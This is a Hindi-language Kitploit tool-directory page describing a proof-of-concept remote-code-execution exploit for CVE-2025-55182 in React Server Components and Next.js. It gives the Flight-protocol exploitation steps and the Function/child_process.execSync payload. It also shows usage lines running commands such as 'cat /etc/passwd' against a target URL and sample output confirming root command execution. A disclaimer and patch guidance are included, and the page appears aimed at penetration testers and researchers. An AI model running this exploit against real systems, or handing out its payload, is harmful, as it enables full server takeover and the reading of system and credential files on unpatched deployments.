Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55182_PoC — CVE‑2025‑55182 के लिए Proof-of-Concept RCE जो Next.js App Router पर React Flight प्रोटोकॉल का शोषण करता है। | Kitploit
उपकरण/GitHubGitHub/rl0x01/cve-2025-55182_poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubrl0x01/cve-2025-55182_poc

CVE-2025-55182_PoC

CVE‑2025‑55182 के लिए Proof-of-Concept RCE जो Next.js App Router पर React Flight प्रोटोकॉल का शोषण करता है।

रिपॉजिटरी देखें
129 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-55182 - React Server Components RCE PoC

लेखक: rl0x01

विवरण

CVE-2025-55182 एक गंभीर (CVSS 10.0) दूरस्थ कोड निष्पादन (RCE) भेद्यता है जो React Server Components को Flight प्रोटोकॉल के माध्यम से प्रभावित करती है।

कमजोर संस्करण

Next.jsReact
14.3.0-canary.77 to 15.0.419.0.0
15.1.1-canary.0 to 15.1.819.1.0
15.2.0-canary.0 to 15.2.519.1.1
15.3.0-canary.0 to 15.3.519.2.0
15.4.0-canary.0 to 15.4.7
15.5.1-canary.0 to 15.5.6
16.0.0-canary.0 to 16.0.6

स्थिर संस्करण

Next.js
15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7+

शोषण तंत्र

  1. एक कच्चा Chunk संदर्भ प्राप्त करने के लिए $@ का उपयोग करता है
  2. $1:__proto__:then के माध्यम से .then को Chunk.prototype.then से ओवरराइट करता है
  3. initializeModelChunk को ट्रिगर करने के लिए status को resolved_model पर सेट करता है
  4. Blob डिसीरियलाइज़ेशन को ट्रिगर करने के लिए $B1337 का उपयोग करता है
  5. _formData.get को Function कंस्ट्रक्टर की ओर इंगित करता है
  6. _prefix में निष्पादित करने के लिए JS कोड होता है

कोड इसके माध्यम से मूल्यांकित किया जाता है:

root@kitploit:~
Function("throw new Error(require('child_process').execSync('COMMAND').toString());//1337")

स्थापना

root@kitploit:~
pip install -r requirements.txt

उपयोग

जाँच करें कि लक्ष्य कमजोर है या नहीं

root@kitploit:~
python cve_2025_55182_poc.py https://target.com --check-only

एक कमांड निष्पादित करें

root@kitploit:~
# Default command (id)
python cve_2025_55182_poc.py https://target.com

# Custom command
python cve_2025_55182_poc.py https://target.com -c "whoami"
python cve_2025_55182_poc.py https://target.com -c "cat /etc/passwd"
python cve_2025_55182_poc.py https://target.com -c "dir C:\\"

विकल्प

विकल्पविवरण
urlलक्ष्य URL (आवश्यक)
-c, --commandनिष्पादित करने का कमांड (डिफ़ॉल्ट: id)
--check-onlyकेवल भेद्यता की जाँच करें
-t, --timeoutसेकंड में टाइमआउट (डिफ़ॉल्ट: 15)
-v, --verboseविस्तृत आउटपुट
--rawकच्चा प्रतिक्रिया दिखाएं

कमजोर परीक्षण प्रयोगशाला

root@kitploit:~
cd vulnerable-app
npm install
npm run dev
# Server at http://localhost:3000

उदाहरण आउटपुट

root@kitploit:~
+======================================================================+
|  CVE-2025-55182 - React Server Components RCE                     |
|  React Flight Protocol Deserialization Vulnerability               |
+======================================================================+
[*] Affected: React 19.0.0-19.2.0 / Next.js 14.3-16.0.6
[*] CVSS Score: 10.0 (CRITICAL)
[*] Author: rl0x01

[*] Target: http://localhost:3000
[*] Timeout: 15s

[1/2] Checking vulnerability...
[+] VULNERABLE! RCE Confirmed - Output received

[2/2] Executing command: whoami
[+] Payload sent!

============================================================
RESULT: whoami
============================================================
root
============================================================

परियोजना संरचना

root@kitploit:~
CVE-2025-55182/
├── cve_2025_55182_poc.py    # Main exploit script
├── requirements.txt          # Python dependencies
├── README.md                 # Documentation
└── vulnerable-app/           # Vulnerable Next.js app for testing
    ├── package.json
    ├── next.config.js
    └── app/
        ├── layout.js
        ├── page.js
        └── actions.js

अस्वीकरण

⚠️ यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है।

इस उपकरण का उन प्रणालियों के विरुद्ध अनधिकृत उपयोग जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है, अवैध है।

शमन

  1. Next.js को अपडेट करें 15.0.5+, 15.1.9+, 15.2.6+, 15.3.6+, 15.4.8+, 15.5.7+, या 16.0.7+ पर
  2. React को पैच किए गए संस्करण में अपडेट करें
  3. दुर्भावनापूर्ण Flight प्रोटोकॉल पेलोड को अवरुद्ध करने के लिए WAF नियम लागू करें
टूल डाउनलोड करें